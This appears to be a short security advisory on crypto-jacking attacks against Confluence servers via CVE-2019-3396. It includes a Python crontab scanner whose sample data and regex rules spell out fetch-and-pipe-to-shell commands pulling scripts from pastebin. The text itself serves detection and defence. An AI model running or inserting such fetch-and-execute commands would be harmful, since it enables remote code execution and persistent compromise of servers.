Crypto-mining attacks against Confluence servers with CVE-2019-3396
released on 2019-04-17 @ 12:03:59 PM
Users have reported numerous compromised Confluence instances, mostly occurring on April 10th.
The installation methodology appears to be the standard crypto-jacking pattern: exploitation of CVE-2019-3396, followed by running shell scripts fetched from Pastebin. These scripts then install crypto-currency miners and persist via cron.
Victims have reported manual interaction, enabled by reverse shells launched from the Pastebin scripts placed in the crontab to run.
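As an added illustration (not code from the original report), a small Python check that flags crontab entries showing the persistence pattern described above: a fetch from pastebin.com piped into a shell, or a command run out of a temp directory. The crontab contents, paths and paste ids below are constructed for the demonstration and are not observed indicators.

```python
import re
from typing import Dict, List

# Constructed sample crontab, not a real capture: the schedules, paths and
# pastebin paste ids are made up for the demonstration.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /opt/atlassian/confluence/bin/backup.sh
*/10 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLEID | sh
@reboot /bin/sh /tmp/.cache/update.sh
30 4 * * 0 wget -q -O - http://pastebin.com/raw/EXAMPLEID2 | bash
"""

# Each rule is (name, regex). These are heuristics to triage, not proof.
RULES = [
    ("fetch_from_paste_site", re.compile(r"\b(curl|wget)\b[^|;&]*pastebin\.com", re.I)),
    ("pipe_to_shell", re.compile(r"\|\s*(/bin/)?(ba|da)?sh\b")),
    ("exec_from_tmp", re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/\S+")),
]


def cron_command(line: str) -> str:
    """Return the command part of a crontab line ('' for blank/comment lines).

    Handles both the five-field schedule form and @reboot/@hourly shortcuts.
    For /etc/crontab the user field stays inside the returned command, which
    does not affect the pattern matching.
    """
    s = line.strip()
    if not s or s.startswith("#"):
        return ""
    n = 1 if s.startswith("@") else 5
    parts = s.split(None, n)
    return parts[n] if len(parts) > n else ""


def flag_line(line: str) -> List[str]:
    """Names of the rules triggered by one crontab line, in RULES order."""
    cmd = cron_command(line)
    return [name for name, rx in RULES if cmd and rx.search(cmd)]


def scan_crontab(text: str) -> Dict[str, List[str]]:
    """Map each suspicious crontab line to the rule names it triggered."""
    findings: Dict[str, List[str]] = {}
    for line in text.splitlines():
        hits = flag_line(line)
        if hits:
            findings[line.strip()] = hits
    return findings


if __name__ == "__main__":
    for entry, hits in scan_crontab(SAMPLE_CRONTAB).items():
        print(f"{', '.join(hits):40} {entry}")
```

Run it against `crontab -l` output for each user and the files under /etc/cron* to triage a suspected host; a hit still needs a human to confirm.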
There are infrastructure links between many of these attacks and an earlier Anomali report on the Rocke group.